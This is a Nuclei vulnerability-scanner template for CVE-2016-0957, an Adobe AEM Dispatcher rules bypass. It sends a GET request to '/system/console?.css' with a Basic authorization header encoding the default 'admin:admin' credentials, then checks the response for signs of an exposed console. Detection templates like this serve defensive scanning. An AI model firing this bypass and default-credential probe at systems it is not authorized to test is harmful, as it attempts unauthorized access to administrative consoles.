nuclei-templates/cves/2016/CVE-2016-0957.yaml

38 lines
1.1 KiB
YAML

id: CVE-2016-0957
info:
name: Adobe AEM Dispatcher <4.15 - Rules Bypass
author: geeknik
severity: high
description: Dispatcher before 4.1.5 in Adobe Experience Manager 5.6.1, 6.0.0, and 6.1.0 does not properly implement a URL filter, which allows remote attackers to bypass dispatcher rules via unspecified vectors.
reference:
- https://www.kernelpicnic.net/2016/07/24/Microsoft-signout.live.com-Remote-Code-Execution-Write-Up.html
- https://helpx.adobe.com/security/products/experience-manager/apsb16-05.html
- https://nvd.nist.gov/vuln/detail/CVE-2016-0957
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2016-0957
tags: cve,cve2016,adobe,aem
requests:
- method: GET
path:
- "{{BaseURL}}/system/console?.css"
headers:
Authorization: "Basic YWRtaW46YWRtaW4K"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "Adobe"
- "java.lang"
- "(Runtime)"
condition: and
# Enhanced by mp on 2022/06/08